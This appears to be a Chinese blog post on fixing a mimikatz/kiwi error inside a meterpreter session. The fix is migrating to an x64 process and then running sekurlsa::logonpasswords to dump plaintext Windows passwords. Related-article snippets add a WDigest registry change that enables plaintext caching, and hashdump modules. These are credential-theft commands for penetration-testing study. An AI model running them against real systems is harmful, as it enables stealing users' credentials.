msf 使用mimikatz获取明文密码过程中报错Retrieving wdigest credentials

最新推荐文章于 2023-09-07 09:42:16 发布
最新推荐文章于 2023-09-07 09:42:16 发布
阅读量1.3k 收藏 3
点赞数 6
分类专栏: msfconsole
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/x_sweelg/article/details/117480834
版权

首先我使用的kali是2021的

当我们用meterpreter提权成功得到system权限之后

meterpreter > getuid

加载mimikatz

load mimikatz

不论运行什么命令都报错Retrieving wdigest credentials

 

看了别人的方法说用以下命令可以实现

mimikatz_command -f samdump::hashes

其实这是老版本的用法,运行还是会报错

 

当我们加载mimikatz后可以用help来查看使用方法

meterpreter > help

然后又使用以下命令还是无法实现

meterpreter > kiwi_cmd -f sekurlsa::logonpasswords

不过总算找到了原因,mimikatz的x86无法访问x64

getpid和ps查看一下进程

meterpreter > getpid
meterpreter > ps

2600果然在x86下,所以只需要迁移进程到x64下就可以了

meterpreter > migrate 1864

随便找了个迁移到了1864下

 

接下来就能运行mimikatz的所有命令了

meterpreter > creds_tspkg

meterpreter > kiwi_cmd -f sekurlsa::logonpasswords

就能获取到明文密码了

 

 

 

 

Sweelg
关注
  • 6
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
msfconsole
12-12
kail、ubantu的msfconsole平台的用法,如search导入,use调用等等
VisualStudio2010UltimateMSF过程模型的设计
03-23
但不包括UML细节和其他架构概念,并且将看到使用VS2010建模功能的每一个设计过程,其 过程模型是软件工程学的一部分,就好比我们用什么过程方法进行软件“房子”的建设。在本节,我们将对VS2010新提供和架构...
【已解决】未解决-mimikatz尝试获取win10明文口令报错
热门推荐
高冷的宅先生
04-06 1万+
1.说明 尝试用mimkatz抓取win10明文口令 按照网上的说明,修改了注册表 reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f 使用时注意各种以管理员运行 使用ProcDump和任务管理器lsass都创建转储文件...
域渗透PTT票据传递攻击(Pass the Ticket)
Longwaer
01-21 1677
通过笔记全方位讲解,加速学习了解PTT票据传递攻击的方法及原理,更好的去掌握黄金、白银票据生成。
【工具使用】——MSF使用_使用MSF抓取用户密码
weixin_45588247的博客
08-08 6176
一、抓取自动登录的密码:   很多用户习惯将计算机设置自动登录,可以使用run windows/gather/credentials/windows_autologin抓取自动登录的用户名和密码。   点击进入:开启windows用户自动登陆的方法! 命令: run windows/gather/credentials/windows_autologin 二、导出密码哈希: 1. run hashdump命令:   hashdump模块可以从SAM数据库导出本地用户账号,该命令的使用需要系统权限
ATT&CK实战系列——红队实战(—)
plant1234的博客
03-25 3504
环境搭建 一共三台八靶机 密码都是:hongrisec@2019 网络结构: web服务器由win7来作 用WMware来启动三台机子 增加一个虚拟网口: 子网为:192.168.52.0 给win7在添加一个网络,自定义我们刚刚添加的VMnet2: 把另外两台都设置成VMnet2 进入win7配置网络: 配置网络一个是在:192.168.52.2的网段下 另一个是在:与自己的kali在一个网段下 在进入win7启动phpStudy 并安装好yxcms WEB服务渗透 首先发现主机: 在对主机端
mimikatz获取windows平台的用户密码以及解决报错问题记录
weixin_44723534的博客
03-26 6831
一、思路 1.准备虚拟机环境windows7、windows10 2.检查电脑是32位还是64位 3.根据电脑32位/32位下载mimikatz工具 4.提前把电脑杀毒功能关闭 5.支持获取用户密码平台 支持:windows 7、windows server 2008、windows server 2012 不支持:windows10 6.mimikatz工具功能 mimikatz工具直接从lsass.exe进程里获取windows处于active状态账号的明文密码。 支持提升进程权限、注入进程,读取进程内
MSF渗透利用木马
nnjnknkj的博客
12-28 739
基于木马的渗透测试
【问题记录】防止mimikatz获取明文密码
weixin_43376075的博客
10-19 884
个人笔记-问题记录-mimikatz
mimikatz的原理,哪个补丁导致了mimikatz无法获取明文密码,如何绕过?
Ping_Pig的博客
11-10 3469
讲在前面: 对于mimikatz的原理本文只通过简单的话语表述,并在文章后给出分析的思路和参考文章。对于绕过补丁,本文只对KB2871997补丁做阐述,并且犹豫对mimikatz的介绍文章非常之多,所以本文只取重点罗列,让读者能够简单快速的明白关键点,深入理解在文章后给出分析思路和参考文章。 mimikazt的原理 注意:本文对mimikatz获取lsass.exe进程明文密码的原理做简单描述。 开发语言:C/C++。 开发初衷:深入学习Windows系统以及C/C++语言。 获取明文密码
内网实验1:getshell、上线提权、抓取主机密码
soldi_er的博客
05-11 2770
文章目录概述实验1:phpmyadmin弱口令+写木马 概述   实验目标:省略外部打点过程,侧重于拿到system权限之后的事宜。   环境情况如下,发现宿主机难以访问Win7服务器,可以用Kali访问。 宿主机:192.168.43.56 Kali攻击机:192.168.43.57 Win7外网服务器:192.168.43.100 实验1:phpmyadmin弱口令+写木马   Kali机访问192.168.43.100/phpMyAdmin,弱口令root/root登录。   phpMyAdmin
通信与网络MSF基于组件的业务框架
11-14
MSF定义的基于组件的业务框架如图所示。该框架包括业务组件和业务代理两大主要功能。业务组件是捆绑或集成在一起的多个业务对象,用来创建销售给用户的业务,有三种类型的业务组件。  图 MSF基于组件的业务框架 ...
基础电子MSF业务框架与IMS的关系
11-14
通过对MSF业务框架和IMS业务平台的分析,可以看出MSF的业务代理相当于IMSS-CSCF,应用层业务组件相当于IMS的应用服务器,媒体服务组件相当于IMS的多媒体资源功能,而数据业务组件则相当于IMS的统一数据库...
元器件应用MSF系列MSF7907集成电路实用检测数据
11-20
MSF7907是-7V电源稳压电路,为3脚单列直插式塑料封装,在索尼HCD-700/V800型VCD影碟机电路IC1004上的正常工作电压典型检测数据如表8所列,用MF14型三用表测得(DC挡)。 表 MSF7907在索尼HCD-700/V800型VCD影碟机...
元器件应用MSF系列MSF7905集成电路实用检测数据
11-20
MSF7905是-5V电源稳压电路,为3脚单列直插式塑料封装,在索尼MDP-U3/D3型VCD影碟机电路IC701上的正常工作电压和在路电阻典型检测数据如表所列,用MF14型三用表测得(电压测量DC挡,电阻测量×100Ω挡)。 表 MSF...
从外网到域控(vulnstack靶机实战)
永不垂头的博客
08-21 1214
从外网到域控(vulnstack靶机实战) 文章目录从外网到域控(vulnstack靶机实战)前言一、外网初探登录进入Yxcms二、登录phpmyadmin三、杀入内网四、内网漫游五、我的公众号 前言 vlunstack是红日安全团队出品的一个实战环境,具体介绍请访问:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 拓扑结构大体如下: 一、外网初探登录进入Yxcms 用字典爆破出密码:123456 登录进去 查找有用信息 进入index查看
【Metasploit】MSF常用命令
m0_62783065的博客
02-06 1688
【Metasploit】MSF常用命令
mimikatz使用
最新发布
愿路途漫长,莫失莫忘。 愿不骄不躁,安稳顺心。
09-07 166
需要HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest的"UseLogonCredential"设置为1,类型为DWORD 32才可以,然后下次用户再登录,就能记录到明文密码了。默认配置是抓不到明文密码了,神器mimikatz显示Password为null。第二条:sekurlsa::logonpasswords。第一条:privilege::debug。
mimikatz 使用
ZKCQM23的博客
09-09 3488
我就说一个,如果爆ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061 右击以管理员身份打开就可以了 或者在开始菜单的CMD里,cd到目录打开
kali怎么使用命令启动msf
03-07
您可以使用以下命令启动 Metasploit Framework (MSF): 1. 打开终端并输入命令 "service postgresql start" 启动 PostgreSQL 数据库。 2. 输入命令 "msfdb init" 初始化 Metasploit 数据库。 3. 输入命令 "msfconsole" 启动 Metasploit 控制台。 请注意,这些命令需要在 Kali Linux 以 root 用户身份运行。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sweelg

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值